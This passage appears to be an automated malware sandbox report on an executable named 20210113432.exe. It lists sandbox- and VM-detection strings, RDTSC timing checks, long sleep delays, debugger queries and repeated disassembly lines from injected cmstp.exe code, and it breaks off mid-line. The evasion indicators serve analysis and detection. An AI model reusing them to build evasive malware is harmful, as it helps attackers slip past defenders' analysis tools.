          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 20210113432.exe PID: 1476, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\20210113432.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000008498E4 second address: 00000000008498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000849B4E second address: 0000000000849B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\20210113432.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\20210113432.exe TID: 4360Thread sleep time: -52304s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exe TID: 1416Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6680Thread sleep count: 51 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6680Thread sleep time: -102000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5296Thread sleep time: -110000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.278109788.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.278109788.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000003.00000000.268046635.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000002.623832514.00000000069DE000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\20210113432.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0040ACC0 LdrLoadDll,2_2_0040ACC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491849B mov eax, dword ptr fs:[00000030h]10_2_0491849B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909080 mov eax, dword ptr fs:[00000030h]10_2_04909080
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04983884 mov eax, dword ptr fs:[00000030h]10_2_04983884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04983884 mov eax, dword ptr fs:[00000030h]10_2_04983884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493F0BF mov ecx, dword ptr fs:[00000030h]10_2_0493F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493F0BF mov eax, dword ptr fs:[00000030h]10_2_0493F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493F0BF mov eax, dword ptr fs:[00000030h]10_2_0493F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049490AF mov eax, dword ptr fs:[00000030h]10_2_049490AF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov ecx, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8CD6 mov eax, dword ptr fs:[00000030h]10_2_049D8CD6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C14FB mov eax, dword ptr fs:[00000030h]10_2_049C14FB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h]10_2_04986CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h]10_2_04986CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h]10_2_04986CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049058EC mov eax, dword ptr fs:[00000030h]10_2_049058EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D4015 mov eax, dword ptr fs:[00000030h]10_2_049D4015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D4015 mov eax, dword ptr fs:[00000030h]10_2_049D4015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987016 mov eax, dword ptr fs:[00000030h]10_2_04987016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987016 mov eax, dword ptr fs:[00000030h]10_2_04987016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987016 mov eax, dword ptr fs:[00000030h]10_2_04987016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D740D mov eax, dword ptr fs:[00000030h]10_2_049D740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D740D mov eax, dword ptr fs:[00000030h]10_2_049D740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D740D mov eax, dword ptr fs:[00000030h]10_2_049D740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]10_2_04986C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]10_2_04986C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]10_2_04986C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]10_2_04986C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C